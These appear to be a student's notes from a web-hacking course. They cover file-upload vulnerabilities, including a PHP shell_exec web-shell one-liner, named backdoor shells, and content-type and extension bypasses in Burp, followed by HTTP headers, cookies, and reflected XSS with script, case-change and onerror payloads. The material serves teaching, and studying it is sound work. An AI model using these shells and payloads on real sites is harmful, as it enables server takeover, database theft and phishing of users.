We will now upload this file & run it (download it) & here we can see the kind of user we are. (let's say: nginx)

If we open the command prompt in our system & type whoami, we will get our username as the result. But here, since we are running the command through the server software, which in this case is nginx, hence we get the nginx user.

If we got root for linux or anti authority/system for windows or administrator as the output for the whoami command, It means we have complete administrative control of the server. There are numerous commands we can run on a server, but first we have to identify if its a windows based or linux based server. since, most commands in php are specific to only one of these servers. whoami got executed cause it is for both windows & linux servers. To identify what server it is:

echo shell_exec ($_GET[‘cmd’]);

Shell_exec: function, does the same work as exec function used above.

$_GET: is used to get this value here ['cmd’] when it is passed and since the function is shell_exec, this value that will be passed, will get executed. Now, since this is a GET based request, we can enter this value of cmd in our URL ourselves.

Now, we will upload & run this command. As we will see in the URL, we can now insert our command as a GET parameter.

Now, Here we can use either of these commands (Dir / Ls) to identify the type of server. These commands let us see if the server is windows or linux based.

Dir → Windows and Ls → linux.

Now, we will pass the Ls command.

….URL….?cmd= Ls

Result: We will get some files here:

Helloworld.php, whoami.php and resume.php

This implies the server is linux based.

But now, we don’t know all the commands of linux. So what do we do now?

The hacker community is well established, they have created php web shells.

PHP web shells: Codes of php that allow us to interact with any type of server, without knowing many linux or windows commands. B374K mini shell, B374K shell, C99 shell, C100 shell, 404 shell, R57 shell & uploader shell.

Uploading a shell on any website without consent is a severe crime. It comes under mass cyber attack as all websites on a server can be affected & exploited if some other hacker finds it.
Shells are basically back doors or sometimes known as malwares. or trojans. Once installed /uploaded on a website, they can give a hacker complete access to the server of that website.

Uploading Shells

Where do we get access to a shell?

They are available on the internet & we can download them.

B374K: We will save the file as minishell.php & upload on the required website & run it. Most shells by default are encoded by a password & for this shell, password is root.

This is basically a file browser through which we can get access to any file on the server.

Although, it is possible that all these files cannot be accessed by us. Since they may have some restrictions.

To see what websites are running on this server:

For this, we will select www from the red path on top of the table, which will show us all the websites.

Now, if more than one website is hosted on a server, the hacker can get access to all of these. But, what if we want to access more critical files of all the server administrators. This can be done by navigating to the home folder, but we may have limited access to these folders.

This shell will also let us execute commands on the server. So we can type any linux command in the text field above the menu. (e.g. whoami | result: nginx)

By clicking on the information tab, we can get a lot of internal info about the server. By clicking on the process tab, we can even kill some processes. that are running on the server. (you can read more about this online). as we browse more, we might run into some configuration files present on the server (say: config.php). If we are lucky, it might contain the entire code of the file & database, passwords etc.

We can go to the connect tab & enter the database username & password here, and see what we can get.

We might get complete access to the database (in this case, the database of the hacking lab & all the files / tables in it.) (no need for sql injection anymore.)

We can click on any database names & see the tables inside them. We can even read the data inside these tables.

→ So this is how a simple file upload vulnerability can give complete access to the database of a website & all the websites hosted on that server & hacker can destroy them all.

But, uploading a php shell, even when we are asked to upload a php file is not gonna be possible for all the websites.

Example 2: Suppose a web site asks us to upload pdf files.

We will turn on intercept in burp suite, upload the file and forward the request. (Helloworld.php file). It will show an error for Helloworld.php file. (might say: Invalid tile type). But, .pdf file, it will accept. If we see the request for both of these, we will see a filename and content-type header.

For php: Content-Type: application/octet-stream

For pdf: Content-type: application/pdf

This is where the 2 requests differ from each other & this is probably what is stopping us from uploading the php file. So, now if we turn intercept on, & upload the file, Intercept its request & change the content-type to pdf & forward the request. It will get uploaded. Now, if we try downloading it (i.e running it). It will work. This is how we can trick the server. So we can again upload the shell here, like before.

Not all websites will allow us to change the content type header.

Example 3: Suppose a website wants us to upload .jpeg, .gif or .png file.

So if we upload a .php file type, it is invalid. Now, if we turn on the intercept on the burp suite, we will find that no request for the file is going to the server (i.e. file is being blocked on the client side itself). So, we can try saving the file name as 'Helloworld.jpeg’ Instead of Helloworld.php. By doing this, we will receive a request when we upload the file. Now, we can intercept this request and change the file name back to helloworld.php and then forward the request (since the .jpeg file was of no use to us).

If it still throws an error, then this means that we cannot upload a .php file, no matter what (i.e. we cannot infect the server). But we can try uploading some other file, with some other type of impact (say Html, since It is client side language). Then maybe we can deface the website or make the user do something that the website did not intend us to do.

We know that it won’t let us upload a .html file. So we will change the file name to .jpeg extension & then upload it & intercept the request (while uploading). Then we will change the extension in the file name back to html. The file will get uploaded and we will run it.

→ The attacker can upload fishy forms & ask the user for personal details (like credit card numbers) & since the user trusts the website, he might fall for the trick.

Understanding Response Headers

So, in the previous module, we looked at some server side attacks. These attacks are used to attack the server or to take complete control of the server. It is important to know server side languages like PHP and sql to carry out these attacks, or to prevent them.

However, in this module, we will look at the client side attacks. These attacks are used to cause harm to the users of a web application directly.

So, by carrying out these attacks, the hacker can directly attack the browser of the victim. To understand these attacks, we need to know client side languages like HTML and Javascript.

To understand client-side attacks, let us first understand how a web browser works.

We know that when we open a website, let’s say internshala, an HTTP request is sent to the server. The server then processes this request and sends back an HTTP response to our browser. Now, this HTTP response is parsed by our browser and displayed to us.

But, this HTTP response contains something called HTTP headers. These headers are the metadata that is not shown to us.

But, if we analyse these response headers, we can learn a lot about the way HTTP responses work.

Now usually the HTTP response headers are very lengthy, and we are not going to look at each and every line.

We will mainly look at 3 important HTTP response headers.

The first line of the header, tells us about the nature of the response.

The set-cookie header.

Content length header.

We will look at each one of these.

Let’s start with the first line of the response header.

So, this is a sample HTTP response captured by BurpSuite.If we look at the first line of this response, it says, HTTP/1.1 200 OK.

We have seen this response many times in the previous module. The 200 response means that everything is okay.

Now, this is just one type of response. There are a few more important responses that we must know about.

30X: A response in the 300 range is used to signify redirection. For example, if you requested for page 1, but are being redirected to page 2. In this case, the response will say, “301 Moved Permanently to Location: page2”.

40X: These responses depict errors that occur due to the user’s fault. The most common response we have all come across is 404:Not Found error. We get this response when the page we have requested for does not exist.

Another example is the 403: Forbidden response. This comes when you request for a page that you are not supposed to visit.

50X: These responses occur when there has been some error on the server side. For example, if a website is not able to connect to its database due to some server side code error, you might see 500 internal server errors.

So, these were some important responses sent in headers.

You must remember these ranges and their meaning well, since by looking at this we can get an idea of what kind of response the server wants to give us.

Now, after the first line of the response headers, we see some standard HTTP response headers. These headers basically tell the browser about the response and how to handle it. They are like the configuration settings sent by a web server to be stored in the browser for later usage.

In these settings, you may choose to study about some of them in detail. These include the Content Security Policy, Referrer Policy, Allow Origin, X-powered-by, etc. We will not be covering these in our topic, but you can read more about them online.

HTTP response headers:

First line of the response.
Set cookie header.
Content length header.

Understanding Sessions & Cookies

Let's say we go to McDonalds and order Meal 1 (aloo burger + fries + coca). Order is given to us, we eat and we leave. This whole process is called a session.

Now suppose, the next day, we order the same thing. They don't remember us, and don't know our preferences. This type of transaction is impersonal in nature.

To make this more personalised, let's say Mcdonalds gives us a card in which our preferences & card no.s etc are saved. (It's like an identification card with some digits on it.) This card is called a cookie. So, the next time we visit, we show our card, they match the no. on their server & now have our old orders, preferences & payment details etc. Hence giving us a more personalised experience. Here:

Us → browser/client

Mcdonald → Server

ID card → cookie given by server

Cookies are stored in our browser, Just like the card is kept by us. When we visit a website, the browser takes the cookie to the server in the Http request. Then, the server reads this request, identifies us, & sends back an Http response. This makes our experience personalised on that website, based on our previous sessions or visit.

If someone gets hold of the cookie, they can impersonate us and get hold of our important data from the server (eg: Mcdonalds has ar payment details, they can place multiple orders on our name & money from our acc will be deducted automatically).

Therefore, Cookies are crucial to hacking & their proper storage is important.

Suppose our cookie (ID card) is only valid for a month (say, till 1st Dec). So, when we visit on Dec 2nd, we don't have a cookie card. But we have an account on mcdonalds where all our preferences & customizations are stored on their server. To access this, we will need a password that we have. We give this password & they will create a new cookie card for us. Which again can be used for another month.

Now suppose we visit a website A, login to our account & it gives us a cookie. This cookie has an expiration time of 50 days. So once it expires, It automatically gets deleted from our browser. So, next time we visit after 50 days, we will have to login again, and it will give us a new cookie.

2 major uses of a cookie:

A cookie is used to give us a personalised experience on a website.
It is used to authenticate us at each action we take on a website. So that you do not have to put your credentials at each step of your journey on the website. This makes the browsing experience convenient for a user.

Sessions: Sessions start when we visit a website & they end when you leave a website.

Cookies:

Cookies are a client side piece of information and are stored in our browser.
They are used to give us a personalised experience.
They are used to identify us as a user & authenticate us automatically at each step, so that we don't have to enter our password at each action we take.
Every cookie has an expiration time.
A cookie becomes invalid & gets deleted upon expiry.

Cookie token: A cookie token is a string of alphanumeric characters. It's 30-100 characters long & hence doesn't make the browser very heavy.

eg: Midasti12490wfwef3434dw323edwfwfw2325esijadr3

→ Suppose we open facebook & type username & password. The 1st HTTP request sent will look like this:

POST/loginHTTP/1.1

Host:facebook.com

Username: sunflower@123.com

Password: yurionince7

Then facebook sends a cookie in its response.

PHPSESSID: iuehgwro73y483653874563478tgeruygfejrgf

Facebook also stores this cookie token in its server so as to identify us. So, next time we visit facebook, HTTP request sent from our browser looks like this:

GET/HTTP/1.1

Host:facebook.com

Cookie: PHPSESSID: iuehgwro73y483653874563478tgeruygfejrgf

The server sees this cookie, knows it's you, & you're logged in! We did not have to type the credentials again.

Set cookie header

Let's look at this response captured by burp suite.

as we can see, all cookies are in this format:

Set-Cookie: csrf-cookie-name = 7ac5599…..tyyfg3

Cookie:

Cookie 1 = value 1

Cookie 2 = value 2

Etc etc.

set-cookie: isc = c23b….985

We know that cookies exist in cookie value pairs. If we see the response, We find there is a session token cookie which is used to maintain a session b/w a client & a server.

sessiontoken = uytkyghff76564…….675; path =/

Content length header:

We know that the content-length header has some number as its value. The number indicates the length of the actual Html response sent by the server, which appears below the headers. This is the actual response that is passed by our browsers & displayed visually for us. eg: content-length: 12394

Please learn how to integrate HTML, javascript, and PHP before moving further.

Also, please learn about DOM (document object model) and event listeners.

What is Cross Site Scripting or XSS?

→ Suppose we are browsing a website & while browsing, we see a pop-up showing a cool deal on a product. We open the pop-up, and We buy that product. As we enter our card details, we see multiple transactions from our card. How did this happen? In the URL, we see the name of our trusted website, followed by some characters. Doesn't look suspicious, but these special characters are actually the malicious script injected by the hacker.

To execute this malicious script, a hacker needs to inject them in the Html code of a web application, which is then executed by our browser.

What is temporary XSS?

The vulnerabilities which allow hackers to insert malicious codes into the Html code of the browser are called temporary cross site scripting or temporary XSS.

The reason this attack is called temporary is because the injection only happens when the user clicks on the hacker made link & is not stored in the Application.

Permanent XSS

There used to be a website named My space (just like facebook). It was brought down by a hacker named Samy by exploiting XSS vulnerability. He found that he was able to reflect special characters into the source code of the Application by entering them in his status. He also realised that if he enters some custom html code in his status, he can pass the same html response to anyone who views his status which can be further executed by their browsers. So to test this, he injected a malicious script that can automatically add anyone to his friendliest, who viewed his status. Due to the injected code, Samy saw that the number of friends in his friend list increased exponentially as the script replicated itself into the html code of all the users of myspace & soon, he was able to control the look of my space & all his users. Just like a virus, the Html code infected all the users of myspace in a short time & eventually, myspace was taken down.

Q. What is temporary XSS?

The vulnerabilities that allow hackers to insert malicious codes into the HTML code of the browser are called as temporary XSS or reflected xss. This attack is called temporary as the injected attack is not stored within the application, rather it infects only those users who have access to these links.

Q. What is permanent XSS?

The vulnerabilities that allow hackers to inject and execute malicious client side scripts through the browser which gets permanently stored in the server are called as permanent XSS or stored XSS.

Q. What is an HTML injection? When a hacker is not able to execute JavaScript using XSS, but still able to cause potential harm using HTML. This particular vulnerability is called HTML injection which occurs due to improper output validation as the website without any proper sanitation attaches the user input to its own HTML code.

Temporary XSS	Permanent XSS
→ Hacker injects & executes malicious client side scripts through the browser.	→ Hacker injects & executes malicious client side scripts through the browser.

How to exploit temporary XSS?

The websites that use user specific information to display customised results are most vulnerable to temporary XSS. eg:

Suppose we are at a page where we have to enter our name and it shows a customised response:

Hello Teeya

How are you?

Now, let's suppose we can see in the URL that we are directed to a page called hello.php and data is being sent as a get based parameter. Eg URL:

…../hello.php?user_name=Teeya

To check for XSS, let's try entering special characters in the URL and see if they are passed as such.

…../hello.php?user_name=Teeya’’<>@#

If instead of throwing us an SQL error, it passes the input as such in the response. This means that whatever we are entering in the URL is getting passed as an HTML response.

We can confirm this by viewing the source code of the page. (for mac: option+command+U and for windows: ctrl + U) under this, we can see our text getting passed inside the paragraph tag of the HTML.

<p> Hi Teeya’’<>@# </p>

This might give us a hint that we can inject custom HTML tags in the URL. Eg:

…../hello.php?user_name=<i>Teeya’’<>@#</i>

We will see Teeya change from normal to italics. We will also see <i> tag added in the source code. This confirms that we can inject our custom HTML tags through get parameters.

Many times it is possible that the special characters we entered in the URL may not be visible on the webpage. This does not mean that the website is not vulnerable to XSS. This can only be confirmed after viewing the source code.

Now, let's try to enter something, which hackers might use. Like creating a hyperlink of our own in the webpage.

…../hello.php?user_name= Teeya <br> <a href= “http://hacker.com”\> login to your account securely </a>

We will see that after inserting our own custom HTML tags in the URL, it has created a hyperlink in the response window of the webpage.

These hyperlinks, when opened, may ask users to enter any confidential information which hackers can steal. And the user will do so, because they trust the website. The hacker can even add obscene or explicit photos or videos on a website. Which can damage the reputation of a website. This is one of the ways through which we can exploit temporary XSS.

As we know, this can also be exploited using java script. So to ensure we use javascript to exploit XSS, we need proof of concept (POC).

If we add the following in the URL:

…../hello.php?user_name= Teeya <br> <a href= “http://hacker.com”\> login to your account securely </a> <script> alert(1)</script>

We will see a pop up window. This pop up window is known as the proof of concept. It basically is a confirmation given by the website that javascript can be executed in this webpage. As we were able to inject and execute the alert box successfully. This means, we can execute anything using java script. Like, using keyloggers that can steal user cookies or session tokens and so much more.

This is how temporary XSS is exploited using HTML and java script, where data is being sent as a get based parameter.

How to bypass protective filters and perform temporary XSS?

It may happen that, in some websites, we are unable to inject using java script. This may happen due to the presence of protective filters. And to execute javascript, we need to bypass them. To do this, 1st we need to figure out if the data we are entering is part of the HTML response or not.

If we try enter a few characters after the text in the url:

…URL…’’’<>

If the text is getting printed as it is in the response, and if we have a look at the HTML code, we can see all the characters in it. Now, let’s try entering HTML tags and see the response.

…URL…<u>...</u>

If the text changed from normal to underlined. And if we take a look at the website code, we can see that we were able to inject our custom HTML code in the website.

This confirms the website is vulnerable to XSS.

Now, if we try to enter javascript,

…URL…<script>alert(1)</script>

It fails. This happens due to the protective filters.

Now, to bypass the protective filters, we need to see what part of the script is getting blocked by the server. If we see the page source:

The <script part was removed from the code. So, to execute the script and not to trigger the protective filters, we need to bypass them.

One way of doing this is by changing how we write <script in the URL.

…URL…<sCript>alert(1)</script>

This will work because we know that javascript is k-sensitive, but HTML is not. So we changed the way we wrote the HTML code to bypass protective filters.

Now, this was one case where we were able to see what part of the code was removed from the page source code. But, we may encounter cases where the script is getting blocked, but we still can execute javascript through HTML. e.g:

As we can see that no part of the HTML is being blocked. So to execute javascript in such cases, we use event listeners.

….<img src=x onerror=alert(1)>....

We know that this will throw an error because the image won’t be found. And hence, we will get our javascript alert box.

This is how we can execute javascript by changing the case, or using event listeners to exploit temporary XSS.

Command Palette

Comments